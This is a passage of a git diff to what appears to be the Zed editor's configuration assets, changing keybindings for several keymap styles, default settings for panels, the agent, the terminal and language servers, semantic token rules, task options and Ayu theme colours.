"ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", "ctrl-shift-r": "agent::OpenAgentDiff", "ctrl-shift-d": "git::Diff", "shift-alt-y": "agent::KeepAll", @@ -338,6 +339,13 @@ "ctrl-alt-.": "agent::ToggleFastMode", }, }, + { + "context": "AcpThread > Editor && mode == full", + "use_key_equivalents": true, + "bindings": { + "alt-enter": "editor::OpenExcerpts", + }, + }, { "context": "AcpThread > Editor && !use_modifier_to_send", "use_key_equivalents": true, @@ -395,6 +403,13 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -412,7 +427,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -426,6 +440,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -613,6 +633,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -671,10 +692,32 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", + "enter": "menu::Confirm", + "ctrl-f": 
"agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], + }, + }, + { + "context": "ThreadsSidebar && not_searching", + "use_key_equivalents": true, + "bindings": { + "space": "menu::Confirm", + }, + }, + { + "context": "ThreadSwitcher", + "bindings": { + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -756,19 +799,15 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "use_key_equivalents": true, "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -815,7 +854,7 @@ }, }, { - "context": "!ContextEditor > Editor && mode == full", + "context": "!AcpThread > Editor && mode == full", "use_key_equivalents": true, "bindings": { "alt-enter": "editor::OpenExcerpts", @@ -887,6 +926,7 @@ "ctrl-v": "project_panel::Paste", "shift-alt-c": "project_panel::CopyPath", "ctrl-k ctrl-shift-c": "workspace::CopyRelativePath", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -911,7 +951,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", 
"use_key_equivalents": true, "bindings": { "up": "git_panel::PreviousEntry", @@ -978,6 +1018,7 @@ "ctrl-shift-enter": "git::Amend", "ctrl-space": "git::StageAll", "ctrl-shift-space": "git::UnstageAll", + "ctrl-k ctrl-r": "git::RestoreAndNext", }, }, { @@ -1049,6 +1090,7 @@ "alt-up": "collab_panel::MoveChannelUp", "alt-down": "collab_panel::MoveChannelDown", "alt-enter": "collab_panel::OpenSelectedChannelNotes", + "shift-enter": "collab_panel::ToggleSelectedChannelFavorite", }, }, { @@ -1116,6 +1158,8 @@ "bindings": { "ctrl-k": "recent_projects::ToggleActionsMenu", "ctrl-shift-a": "workspace::AddFolderToProject", + "shift-backspace": "recent_projects::RemoveSelected", + "ctrl-shift-enter": "recent_projects::AddToWorkspace", }, }, { @@ -1254,6 +1298,10 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", + "find": "buffer_search::Deploy", + "ctrl-f": "buffer_search::Deploy", }, }, { @@ -1331,6 +1379,16 @@ "bindings": { "ctrl-shift-space": "git::WorktreeFromDefaultOnWindow", "ctrl-space": "git::WorktreeFromDefault", + "ctrl-shift-backspace": "git::DeleteWorktree", + }, + }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", }, }, { @@ -1422,8 +1480,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/linux/cursor.json b/assets/keymaps/linux/cursor.json index e1eeade9db16d178fb2ce0ec4b2ec03f0ac2c221..8d5f7b5a76cb09a6c1be2638019f9cd6cf9942de 100644 --- a/assets/keymaps/linux/cursor.json +++ 
b/assets/keymaps/linux/cursor.json @@ -20,7 +20,6 @@ "ctrl-shift-l": "agent::AddSelectionToThread", // In cursor uses "Ask" mode "ctrl-l": "agent::AddSelectionToThread", // In cursor uses "Agent" mode "ctrl-k": "assistant::InlineAssist", - "ctrl-shift-k": "assistant::InsertIntoEditor", }, }, { @@ -34,7 +33,7 @@ }, }, { - "context": "AgentPanel || ContextEditor || (MessageEditor > Editor)", + "context": "AgentPanel || (MessageEditor > Editor)", "use_key_equivalents": true, "bindings": { "ctrl-i": "workspace::ToggleRightDock", @@ -47,7 +46,6 @@ "ctrl-shift-backspace": "editor::Cancel", "ctrl-r": "agent::NewThread", "ctrl-shift-v": "editor::Paste", - "ctrl-shift-k": "assistant::InsertIntoEditor", // "escape": "agent::ToggleFocus" ///// Enable when Zed supports multiple thread tabs // "ctrl-t": // new thread tab diff --git a/assets/keymaps/linux/jetbrains.json b/assets/keymaps/linux/jetbrains.json index bdf3949b3f9203220978ff599e0187513d6a976f..98d5cf93106f35e488ab70a60468fa2239cb08c0 100644 --- a/assets/keymaps/linux/jetbrains.json +++ b/assets/keymaps/linux/jetbrains.json @@ -81,6 +81,13 @@ "ctrl-\\": "assistant::InlineAssist", }, }, + { + "context": "Editor && mode == auto_height", + "bindings": { + "shift-enter": "editor::Newline", + "ctrl-shift-enter": "editor::NewlineBelow", + }, + }, { "context": "BufferSearchBar", "bindings": { diff --git a/assets/keymaps/macos/cursor.json b/assets/keymaps/macos/cursor.json index 2824575a445ad0c870a59cb516441dc6f1421f31..f7cab89fb6118777ea07268cdeef2cf440c7b077 100644 --- a/assets/keymaps/macos/cursor.json +++ b/assets/keymaps/macos/cursor.json @@ -20,7 +20,6 @@ "cmd-shift-l": "agent::AddSelectionToThread", // In cursor uses "Ask" mode "cmd-l": "agent::AddSelectionToThread", // In cursor uses "Agent" mode "cmd-k": "assistant::InlineAssist", - "cmd-shift-k": "assistant::InsertIntoEditor", }, }, { @@ -35,7 +34,7 @@ }, }, { - "context": "AgentPanel || ContextEditor || (MessageEditor > Editor)", + "context": "AgentPanel || 
(MessageEditor > Editor)", "use_key_equivalents": true, "bindings": { "cmd-i": "workspace::ToggleRightDock", @@ -48,7 +47,6 @@ "cmd-shift-backspace": "editor::Cancel", "cmd-r": "agent::NewThread", "cmd-shift-v": "editor::Paste", - "cmd-shift-k": "assistant::InsertIntoEditor", // "escape": "agent::ToggleFocus" ///// Enable when Zed supports multiple thread tabs // "cmd-t": // new thread tab diff --git a/assets/keymaps/macos/jetbrains.json b/assets/keymaps/macos/jetbrains.json index c9106e4d49671f16917b1322824c2edfcd0e7700..304ffb86e8c2fd08fb756b015490f8c4ac424f58 100644 --- a/assets/keymaps/macos/jetbrains.json +++ b/assets/keymaps/macos/jetbrains.json @@ -33,6 +33,7 @@ "cmd-+": "editor::UnfoldLines", "alt-shift-g": "editor::SplitSelectionIntoLines", "ctrl-g": ["editor::SelectNext", { "replace_newest": false }], + "ctrl-shift-g": "editor::UndoSelection", "ctrl-cmd-g": ["editor::SelectPrevious", { "replace_newest": false }], "cmd-/": ["editor::ToggleComments", { "advance_downwards": true }], "alt-up": "editor::SelectLargerSyntaxNode", @@ -79,6 +80,13 @@ "cmd-\\": "assistant::InlineAssist", }, }, + { + "context": "Editor && mode == auto_height", + "bindings": { + "shift-enter": "editor::Newline", + "ctrl-shift-enter": "editor::NewlineBelow", + }, + }, { "context": "BufferSearchBar", "bindings": { diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 1f2742f982bc2165181a797e577b350f5630def9..220b44ff537ffa791b23c0c5b7d86b6768d74dc2 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -337,6 +337,8 @@ "shift-j": "vim::JoinLines", "i": "vim::InsertBefore", "a": "vim::InsertAfter", + "o": "vim::InsertLineBelow", + "shift-o": "vim::InsertLineAbove", "p": "vim::Paste", "u": "vim::Undo", "r": "vim::PushReplace", @@ -427,6 +429,7 @@ "escape": "vim::SwitchToHelixNormalMode", "i": "vim::HelixInsert", "a": "vim::HelixAppend", + "shift-a": "vim::HelixInsertEndOfLine", "ctrl-[": "editor::Cancel", }, }, @@ -510,8 +513,8 @@ "g shift-u": 
"git::UnstageAndNext", // Zed specific // Window mode - "space w v": "pane::SplitDown", - "space w s": "pane::SplitRight", + "space w v": "pane::SplitRight", + "space w s": "pane::SplitDown", "space w h": "workspace::ActivatePaneLeft", "space w j": "workspace::ActivatePaneDown", "space w k": "workspace::ActivatePaneUp", @@ -1014,7 +1017,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, "bindings": { "k": "menu::SelectPrevious", @@ -1059,7 +1062,7 @@ }, }, { - "context": "Editor && edit_prediction", + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "bindings": { // This is identical to the binding in the base keymap, but the vim bindings above to // "vim::Tab" shadow it, so it needs to be bound again. @@ -1072,15 +1075,7 @@ "enter": "agent::Chat", }, }, - { - "context": "os != macos && Editor && edit_prediction_conflict", - "bindings": { - // alt-l is provided as an alternative to tab/alt-tab. and will be displayed in the UI. This - // is because alt-tab may not be available, as it is often used for window switching on Linux - // and Windows. 
- "alt-l": "editor::AcceptEditPrediction", - }, - }, + { "context": "SettingsWindow > NavigationMenu && !search", "bindings": { @@ -1099,6 +1094,9 @@ "ctrl-d": "markdown::ScrollPageDown", "ctrl-y": "markdown::ScrollUp", "ctrl-e": "markdown::ScrollDown", + "g g": "markdown::ScrollToTop", + "shift-g": "markdown::ScrollToBottom", + "/": "buffer_search::Deploy", }, }, { @@ -1118,4 +1116,31 @@ "k": "notebook::NotebookMoveUp", }, }, + { + "context": "ThreadsSidebar && !Editor", + "bindings": { + "j": "menu::SelectNext", + "k": "menu::SelectPrevious", + "h": "menu::SelectParent", + "l": "menu::SelectChild", + "g g": "menu::SelectFirst", + "shift-g": "menu::SelectLast", + "/": "agents_sidebar::FocusSidebarFilter", + "z a": "editor::ToggleFold", + "z c": "menu::SelectParent", + "z o": "menu::SelectChild", + "z shift-m": "editor::FoldAll", + "z shift-r": "editor::UnfoldAll", + }, + }, + { + "context": "ThreadsSidebar > Editor && VimControl && vim_mode == normal", + "bindings": { + "j": "editor::MoveDown", + "k": "editor::MoveUp", + "/": "vim::SwitchToInsertMode", + "escape": "menu::Cancel", + "enter": "editor::Newline", + }, + }, ] diff --git a/assets/settings/default.json b/assets/settings/default.json index 8f724f59b66486b6477fc19155d78c7dd89d33c8..63e906e3b11206fc458f8d7353f3ecba0abeb825 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -225,6 +225,11 @@ // 3. Hide on both typing and cursor movement: // "on_typing_and_movement" "hide_mouse": "on_typing_and_movement", + // Determines whether the focused panel follows the mouse location. + "focus_follows_mouse": { + "enabled": false, + "debounce_ms": 250, + }, // Determines how snippets are sorted relative to other completion items. // // 1. Place snippets at the top of the completion list: @@ -299,6 +304,13 @@ // // Default: split "diff_view_style": "split", + // The minimum width (in em-widths) at which the split diff view is used. 
+ // When the editor is narrower than this, the diff view automatically + // switches to unified mode and switches back when the editor is wide + // enough. Set to 0 to disable automatic switching. + // + // Default: 100 + "minimum_split_diff_width": 100, // Show method signatures in the editor, when inside parentheses. "auto_signature_help": false, // Whether to show the signature help after completion or a bracket pair inserted. @@ -361,8 +373,11 @@ // bracket, brace, single or double quote characters. // For example, when you select text and type '(', Zed will surround the text with (). "use_auto_surround": true, - // Whether indentation should be adjusted based on the context whilst typing. - "auto_indent": true, + // Controls automatic indentation behavior when typing. + // - "syntax_aware": Adjusts indentation based on syntax context (default) + // - "preserve_indent": Preserves current line's indentation on new lines + // - "none": No automatic indentation + "auto_indent": "syntax_aware", // Whether indentation of pasted content should be adjusted based on the context. "auto_indent_on_paste": true, // Controls how the editor handles the autoclosed characters. @@ -457,12 +472,10 @@ "show_sign_in": true, // Whether to show the menus in the titlebar. "show_menus": false, + // The layout of window control buttons in the title bar (Linux only). + "button_layout": "platform_default", }, "audio": { - // Opt into the new audio system. - "experimental.rodio_audio": false, - // Requires 'rodio_audio: true' - // // Automatically increase or decrease you microphone's volume. This affects how // loud you sound to others. // @@ -471,33 +484,10 @@ // audio and has auto speaker volume on this will make you very loud // compared to other speakers. "experimental.auto_microphone_volume": false, - // Requires 'rodio_audio: true' - // - // Automatically increate or decrease the volume of other call members. - // This only affects how things sound for you. 
- "experimental.auto_speaker_volume": true, - // Requires 'rodio_audio: true' - // - // Remove background noises. Works great for typing, cars, dogs, AC. Does - // not work well on music. - "experimental.denoise": true, - // Requires 'rodio_audio: true' - // - // Use audio parameters compatible with the previous versions of - // experimental audio and non-experimental audio. When this is false you - // will sound strange to anyone not on the latest experimental audio. In - // the future we will migrate by setting this to false - // - // You need to rejoin a call for this setting to apply - "experimental.legacy_audio_compatible": true, - // Requires 'rodio_audio: true' - // // Select specific output audio device. // `null` means use system default. // Any unrecognized output device will fall back to system default. "experimental.output_audio_device": null, - // Requires 'rodio_audio: true' - // // Select specific input audio device. // `null` means use system default. // Any unrecognized input device will fall back to system default. @@ -765,6 +755,9 @@ // 5. Never show the scrollbar: // "never" "show": null, + // Whether to allow horizontal scrolling in the project panel. + // When false, the view is locked to the leftmost position and long file names are clipped. + "horizontal_scroll": true, }, // Which files containing diagnostic errors/warnings to mark in the project panel. // This setting can take the following three values: @@ -800,7 +793,9 @@ // "files_first" "sort_mode": "directories_first", // Whether to show error and warning count badges next to file names in the project panel. - "diagnostic_badges": true, + "diagnostic_badges": false, + // Whether to show the git status indicator next to file names in the project panel. + "git_status_indicator": false, // Whether to enable drag-and-drop operations in the project panel. 
"drag_and_drop": true, // Whether to hide the root entry when only one folder is open in the window; @@ -892,6 +887,14 @@ // Choices: label_color, icon // Default: icon "status_style": "icon", + // Whether to show file icons in the git panel. + // + // Default: false + "file_icons": false, + // Whether to show folder icons or chevrons for directories in the git panel. + // + // Default: true + "folder_icons": true, // What branch name to use if `init.defaultBranch` is not set // // Default: main @@ -908,6 +911,14 @@ /// /// Default: false "tree_view": false, + // Whether the git panel should open on startup. + // + // Default: false + "starts_open": false, + // Whether to show a badge on the git panel icon with the count of uncommitted changes. + // + // Default: false + "show_count_badge": false, "scrollbar": { // When to show the scrollbar in the git panel. // @@ -917,8 +928,8 @@ }, // Whether to show the addition/deletion change count next to each file in the Git panel. // - // Default: false - "diff_stats": false, + // Default: true + "diff_stats": true, }, "message_editor": { // Whether to automatically replace emoji shortcodes with emoji characters. @@ -932,6 +943,8 @@ "dock": "right", // Default width of the notification panel. "default_width": 380, + // Whether to show a badge on the notification panel icon with the count of unread notifications. + "show_count_badge": false, }, "agent": { // Whether the inline assistant should use streaming tools, when available @@ -942,12 +955,16 @@ "button": true, // Where to dock the agent panel. Can be 'left', 'right' or 'bottom'. "dock": "right", + // Whether the agent panel should use flexible (proportional) sizing. + // + // Default: true + "flexible": true, + // Where to position the sidebar. Can be 'left' or 'right'. + "sidebar_side": "left", // Default width when the agent panel is docked to the left or right. "default_width": 640, // Default height when the agent panel is docked to the bottom. 
"default_height": 320, - // The view to use by default (thread, or text_thread) - "default_view": "thread", // The default model to use when creating new threads. "default_model": { // The provider to use. @@ -1049,6 +1066,7 @@ "spawn_agent": true, "terminal": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1068,6 +1086,7 @@ "grep": true, "spawn_agent": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1077,6 +1096,10 @@ "tools": {}, }, }, + // Whether to start a new thread in the current local project or in a new Git worktree. + // + // Default: local_project + "new_thread_location": "local_project", // Where to show notifications when the agent has either completed // its response, or else needs confirmation before it can run a // tool action. @@ -1084,11 +1107,14 @@ // "all_screens" - Show these notifications on all screens // "never" - Never show these notifications "notify_when_agent_waiting": "primary_screen", - // Whether to play a sound when the agent has either completed + // When to play a sound when the agent has either completed // its response, or needs user input. - - // Default: false - "play_sound_when_agent_done": false, + // "never" - Never play the sound + // "when_hidden" - Only play the sound when the agent panel is not visible + // "always" - Always play the sound + // + // Default: never + "play_sound_when_agent_done": "never", // Whether to have edit cards in the agent panel expanded, showing a preview of the full diff. // // Default: true @@ -1097,6 +1123,10 @@ // // Default: true "expand_terminal_card": true, + // How thinking blocks should be displayed by default in the agent panel. + // + // Default: auto + "thinking_display": "auto", // Whether clicking the stop button on a running terminal tool should also cancel the agent's generation. // Note that this only applies to the stop button, not to ctrl+c inside the terminal. 
// @@ -1114,6 +1144,11 @@ // // Default: false "show_turn_stats": false, + // Whether to show the merge conflict indicator in the status bar + // that offers to resolve conflicts using the agent. + // + // Default: true + "show_merge_conflict_indicator": true, }, // Whether the screen sharing icon is shown in the os status bar. "show_call_status_icon": true, @@ -1279,6 +1314,8 @@ // * "indexed": Use only the files Zed had indexed // * "smart": Be smart and search for ignored when called from a gitignored worktree "include_ignored": "smart", + // Whether to include text channels in file finder results. + "include_channels": false, }, // Whether or not to remove any trailing whitespace from lines of a buffer // before saving it. @@ -1339,6 +1376,12 @@ "hard_tabs": false, // How many columns a tab should occupy. "tab_size": 4, + // Number of lines to search for modelines at the beginning and end of files. + // Modelines contain editor directives (e.g., vim/emacs settings) that configure + // the editor behavior for specific files. + // + // A value of 0 disables modelines support. + "modeline_lines": 5, // What debuggers are preferred by default for all languages. "debuggers": [], // Whether to enable word diff highlighting in the editor. @@ -1570,13 +1613,6 @@ "model": "codestral-latest", "max_tokens": 150, }, - "sweep": { - // When enabled, Sweep will not store edit prediction inputs or outputs. - // When disabled, Sweep may collect data including buffer contents, - // diagnostics, file paths, repository names, and generated predictions - // to improve the service. - "privacy_mode": false, - }, "ollama": { "api_url": "http://localhost:11434", "model": "qwen2.5-coder:7b-base", @@ -1589,9 +1625,6 @@ "prompt_format": "infer", "max_output_tokens": 64, }, - // Whether edit predictions are enabled when editing text threads in the agent panel. - // This setting has no effect if globally disabled. 
- "enabled_in_text_threads": true, }, // Settings specific to journaling "journal": { @@ -1607,6 +1640,8 @@ "status_bar": { // Whether to show the status bar. "experimental.show": true, + // Whether to show the name of the active file in the status bar. + "show_active_file": false, // Whether to show the active language button in the status bar. "active_language_button": true, // Whether to show the cursor position button in the status bar. @@ -1635,6 +1670,10 @@ "shell": "system", // Where to dock terminals panel. Can be `left`, `right`, `bottom`. "dock": "bottom", + // Whether the terminal panel should use flexible (proportional) sizing. + // + // Default: true + "flexible": true, // Default width when the terminal is docked to the left or right. "default_width": 640, // Default height when the terminal is docked to the bottom. @@ -1831,8 +1870,8 @@ " (", " # multi-char path: first char (not opening delimiter, space, or box drawing char)", " [^({\\[<\"'`\\ \\u2500-\\u257F]", - " # middle chars: non-space, and colon/paren only if not followed by digit/paren", - " ([^\\ :(]|[:(][^0-9()])*", + " # middle chars: non-space, and colon/paren only if not followed by digit/paren/space", + " ([^\\ :(]|[:(][^0-9()\\ ])*", " # last char: not closing delimiter or colon", " [^()}\\]>\"'`.,;:\\ ]", " |", @@ -1847,6 +1886,8 @@ // Timeout for hover and Cmd-click path hyperlink discovery in milliseconds. Specifying a // timeout of `0` will disable path hyperlinking in terminal. "path_hyperlink_timeout_ms": 1, + // Whether to show a badge on the terminal panel icon with the count of open terminals. + "show_count_badge": false, }, "code_actions_on_format": {}, // Settings related to running tasks. 
@@ -2012,9 +2053,12 @@ "remove_trailing_whitespace_on_save": false, "ensure_final_newline_on_save": false, }, - "Elixir": { + "EEx": { "language_servers": ["elixir-ls", "!expert", "!next-ls", "!lexical", "..."], }, + "Elixir": { + "language_servers": ["elixir-ls", "!expert", "!next-ls", "!lexical", "!emmet-language-server", "..."], + }, "Elm": { "tab_size": 4, }, @@ -2038,7 +2082,7 @@ "allowed": true, }, }, - "HEEX": { + "HEEx": { "language_servers": ["elixir-ls", "!expert", "!next-ls", "!lexical", "..."], }, "HTML": { @@ -2140,7 +2184,7 @@ }, }, "Starlark": { - "language_servers": ["starpls", "!buck2-lsp", "..."], + "language_servers": ["starpls", "!buck2-lsp", "!tilt", "..."], }, "Svelte": { "language_servers": ["svelte-language-server", "..."], @@ -2211,6 +2255,9 @@ "api_url": "https://api.openai.com/v1", }, "openai_compatible": {}, + "opencode": { + "api_url": "https://opencode.ai/zen", + }, "open_router": { "api_url": "https://openrouter.ai/api/v1", }, @@ -2370,6 +2417,7 @@ "toggle_relative_line_numbers": false, "use_system_clipboard": "always", "use_smartcase_find": false, + "use_regex_search": true, "gdefault": false, "highlight_on_yank_duration": 200, "custom_digraphs": {}, @@ -2495,21 +2543,31 @@ "format_dap_log_messages": true, "button": true, }, - // Configures any number of settings profiles that are temporarily applied on - // top of your existing user settings when selected from - // `settings profile selector: toggle`. + // Configures any number of settings profiles that are temporarily applied + // when selected from `settings profile selector: toggle`. + // + // Each profile has an optional `base` ("user" or "default") and a `settings` + // object. When `base` is "user" (the default), the profile applies on top of + // your user settings. When `base` is "default", user settings are ignored and + // the profile applies on top of Zed's defaults. 
+ // // Examples: // "profiles": { // "Presenting": { - // "agent_ui_font_size": 20.0, - // "buffer_font_size": 20.0, - // "theme": "One Light", - // "ui_font_size": 20.0 + // "base": "default", + // "settings": { + // "agent_ui_font_size": 20.0, + // "buffer_font_size": 20.0, + // "theme": "One Light", + // "ui_font_size": 20.0 + // } // }, // "Python (ty)": { - // "languages": { - // "Python": { - // "language_servers": ["ty"] + // "settings": { + // "languages": { + // "Python": { + // "language_servers": ["ty"] + // } // } // } // } diff --git a/assets/settings/default_semantic_token_rules.json b/assets/settings/default_semantic_token_rules.json index c5e9d1438cad583e78bc3e109b4bc79c62aa7ac5..c070a253d3065feff6647123b5f687e94f5e85d6 100644 --- a/assets/settings/default_semantic_token_rules.json +++ b/assets/settings/default_semantic_token_rules.json @@ -2,7 +2,9 @@ // // These rules map LSP semantic token types to syntax theme styles. // To customize, add rules to "semantic_token_rules" in your settings.json. -// User-defined rules are prepended to these defaults and take precedence. +// User-defined rules are prepended and take highest precedence. +// Extension language rules are applied next. +// These built-in defaults are applied last. // // Each rule has the following properties: // - `token_type`: The LSP semantic token type to match. If omitted, matches all types. 
@@ -117,6 +119,16 @@ "style": ["type"], }, // References + { + "token_type": "parameter", + "token_modifiers": ["declaration"], + "style": ["variable.parameter"] + }, + { + "token_type": "parameter", + "token_modifiers": ["definition"], + "style": ["variable.parameter"] + }, { "token_type": "parameter", "token_modifiers": [], @@ -199,6 +211,11 @@ "token_modifiers": [], "style": ["comment"], }, + { + "token_type": "string", + "token_modifiers": ["documentation"], + "style": ["string.doc"], + }, { "token_type": "string", "token_modifiers": [], diff --git a/assets/settings/initial_tasks.json b/assets/settings/initial_tasks.json index 5bedafbd3a1e75a755598e37cd673742e146fdcc..bb6c9c04ae14db8f2d01adabd8d1494caa7d7407 100644 --- a/assets/settings/initial_tasks.json +++ b/assets/settings/initial_tasks.json @@ -48,6 +48,11 @@ "show_summary": true, // Whether to show the command line in the output of the spawned task, defaults to `true`. "show_command": true, + // Which edited buffers to save before running the task: + // * `all` — save all edited buffers + // * `current` — save currently active buffer only + // * `none` — don't save any buffers + "save": "none", // Represents the tags for inline runnable indicators, or spawning multiple tasks at once. 
// "tags": [] }, diff --git a/assets/themes/ayu/ayu.json b/assets/themes/ayu/ayu.json index e2b7c3c91fca46ab0e4064719bea5c8793faaccc..f27566c4f72cac3938a752c64d95d0500c595306 100644 --- a/assets/themes/ayu/ayu.json +++ b/assets/themes/ayu/ayu.json @@ -71,31 +71,31 @@ "terminal.background": "#0d1016ff", "terminal.foreground": "#bfbdb6ff", "terminal.bright_foreground": "#bfbdb6ff", - "terminal.dim_foreground": "#0d1016ff", + "terminal.dim_foreground": "#85847fff", "terminal.ansi.black": "#0d1016ff", "terminal.ansi.bright_black": "#545557ff", - "terminal.ansi.dim_black": "#bfbdb6ff", + "terminal.ansi.dim_black": "#3a3b3cff", "terminal.ansi.red": "#ef7177ff", "terminal.ansi.bright_red": "#83353bff", - "terminal.ansi.dim_red": "#febab9ff", + "terminal.ansi.dim_red": "#a74f53ff", "terminal.ansi.green": "#aad84cff", "terminal.ansi.bright_green": "#567627ff", - "terminal.ansi.dim_green": "#d8eca8ff", + "terminal.ansi.dim_green": "#769735ff", "terminal.ansi.yellow": "#feb454ff", "terminal.ansi.bright_yellow": "#92582bff", - "terminal.ansi.dim_yellow": "#ffd9aaff", + "terminal.ansi.dim_yellow": "#b17d3aff", "terminal.ansi.blue": "#5ac1feff", "terminal.ansi.bright_blue": "#27618cff", - "terminal.ansi.dim_blue": "#b7dffeff", + "terminal.ansi.dim_blue": "#3e87b1ff", "terminal.ansi.magenta": "#39bae5ff", "terminal.ansi.bright_magenta": "#205a78ff", - "terminal.ansi.dim_magenta": "#addcf3ff", + "terminal.ansi.dim_magenta": "#2782a0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#bfbdb6ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#787876ff", + "terminal.ansi.dim_white": "#85847fff", "link_text.hover": "#5ac1feff", "conflict": "#feb454ff", "conflict.background": "#572815ff", @@ -283,7 +283,7 @@ "font_weight": null }, "preproc": { - "color": "#bfbdb6ff", + "color": "#ff8f3fff", "font_style": null, "font_weight": 
null }, @@ -391,6 +391,16 @@ "color": "#5ac1feff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#aad94cff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#f07178ff", + "font_style": null, + "font_weight": null } } } @@ -675,7 +685,7 @@ "font_weight": null }, "preproc": { - "color": "#5c6166ff", + "color": "#fa8d3eff", "font_style": null, "font_weight": null }, @@ -783,6 +793,16 @@ "color": "#3b9ee5ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#6cbf43ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#ff6666ff", + "font_style": null, + "font_weight": null } } } @@ -855,31 +875,31 @@ "terminal.background": "#242835ff", "terminal.foreground": "#cccac2ff", "terminal.bright_foreground": "#cccac2ff", - "terminal.dim_foreground": "#242835ff", + "terminal.dim_foreground": "#8e8d87ff", "terminal.ansi.black": "#242835ff", "terminal.ansi.bright_black": "#67696eff", - "terminal.ansi.dim_black": "#cccac2ff", + "terminal.ansi.dim_black": "#48494dff", "terminal.ansi.red": "#f18779ff", "terminal.ansi.bright_red": "#833f3cff", - "terminal.ansi.dim_red": "#fec4baff", + "terminal.ansi.dim_red": "#a85e54ff", "terminal.ansi.green": "#d5fe80ff", "terminal.ansi.bright_green": "#75993cff", - "terminal.ansi.dim_green": "#ecffc1ff", + "terminal.ansi.dim_green": "#95b159ff", "terminal.ansi.yellow": "#fecf72ff", "terminal.ansi.bright_yellow": "#937237ff", - "terminal.ansi.dim_yellow": "#ffe7b9ff", + "terminal.ansi.dim_yellow": "#b1904fff", "terminal.ansi.blue": "#72cffeff", "terminal.ansi.bright_blue": "#336d8dff", - "terminal.ansi.dim_blue": "#c1e7ffff", + "terminal.ansi.dim_blue": "#4f90b1ff", "terminal.ansi.magenta": "#5bcde5ff", "terminal.ansi.bright_magenta": "#2b6c7bff", - "terminal.ansi.dim_magenta": "#b7e7f2ff", + "terminal.ansi.dim_magenta": "#3f8fa0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": 
